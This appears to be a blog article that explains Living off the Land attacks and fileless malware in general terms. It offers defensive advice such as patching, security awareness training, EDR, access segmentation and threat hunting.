Hackers nowadays are going old-school again. If you take a look at the some of the recent hacking events, techniques and strategies that were used years back have come back to the fore again. One such concept of hacking that is gaining traction among hackers is Living off the Land (LotL) Attacks.\u00a0\r\nWhat is Living off the Land (LotL) Attacks?\r\nThere is no silver bullet to fight different types of cyber threats at all times. There are instances when threat actors don\u2019t need a hacking tool; rather, they use tools and applications present in the potential victim\u2019s system to compromise. These types of attacks are called LotL attacks.\r\n\r\nOver the past couple of years, LotL has witnessed a major adoption rate. Attackers are using tools that are already installed on the potential victim\u2019s computers or are running simple scripts and shellcode directly in memory.\r\n\r\nDespite the fact that LotL attacks do not involve any malware, the rate of these cyber-attacks has increased significantly. The reason is that the attackers get enough time to dwell. And the more time they get to stay anonymous, the more opportunities come to them to infiltrate and destroy data or operations.\r\n\r\nOne of the subsets of LotL attacks are Fileless malware. In this type, the attacker exploits dual-use tools and memory only tools, which helps them to stay anonymous even under the plain sight among legitimate system administration work. Also, very few or no files are created during this attack. The major reason behind going fileless is that the lesser the number of files, fewer chances of being detected by security tools.\r\nHow To Fight LotL?\r\nBeing one of the old-schools yet sophisticated ways of hacking, LotL poses a great level of challenge for corporates to identify and defend against this attack. However, there are ways that companies can adopt in order to fight LotL or fileless malware attack.\r\n\r\nSoftware And Security Hygiene\r\n\r\nThis might sound really basic but most of the attacks become successful due to negligence in terms of software that the company uses. There are many organisations all across the world that don\u2019t bother to update or patch any kind of software or tool that they use. This opens the doors for threat actors to find vulnerabilities.\u00a0\r\n\r\nOrganisations should ensure they have an application inventory to identify outdated and unpatched applications and OS so you can securely manage all the applications in your environment.\u00a0 Further, it is also imperative for companies to have security awareness training, which shouldn\u2019t only be about basic email phishing and other threats but also focus on how built-in Windows codes work in order to spot anomalies, malicious activity, or suspicious programs running in the background. If you have enough knowledge about Windows background activities, you are one step ahead than threat actors.\r\n\r\nAssessment Of Events When You Were Hacked\r\n\r\nIt is important to take a look at the previous events getting hacked. Also, look at the files that played a major role. Cyber Security analysts should also focus on tools and systems and use them to gauge the historical attacks, such as suspicious registry keys and suspicious output files, as well as identifying active threats.\r\n\r\nOnce you get a hold of some those affected files or any other prints, make sure you find out where things went wrong and fix them to fight LotL in the future.\r\n\r\nHave Right Endpoint Detection and Response (EDR)\r\n\r\nThere is something called \u201cSilent Failure\u201d when it comes to fighting cyber-attack. Silent failure is when your dedicated cybersecurity defence systems fail to detect to defend a cyber-attack and doesn\u2019t even notify that it had failed. If a fileless malware manages to slip through to gain access to your environment, they might dwell and reside in your system for a quite long time and analyse the entire system for a bigger attack.\r\n\r\nTo overcome this issue, it is important to have the right Endpoint Detection and Response (EDR). This can help companies to figure out suspicious things lying at the endpoints and eliminate them.\r\n\r\nKnow About The Rights To Access and Privileges\r\n\r\nThe emphasis on this point is real. An organisation should have protocols regarding the access rights and privileges for employees. For example, if an employee clicks on a malicious link that doesn\u2019t mean that the malware would land on that employee's system. Rather, it would travel across the network and land on some other system (mostly it\u2019s the richer target). Therefore, segment the network and make sure there is third-party applications and users have strict access protocols.\r\n\r\nHave Dedicated Threat Hunting Strategy\r\n\r\nThe chances of finding threats are more when different teams work to find different kinds of threats. Therefore, it is considered to be good practice for companies to have dedicated threat hunters who would continuously go through different segments of your company's IT infrastructure and look for faint signs of the most sophisticated attacks.\u00a0\r\n\r\nCompanies can either have an in-house threat hunting team or outsource managed threat hunting services. Both works completely fine as they are tailor-made to fill this critical gap for organizations of all types.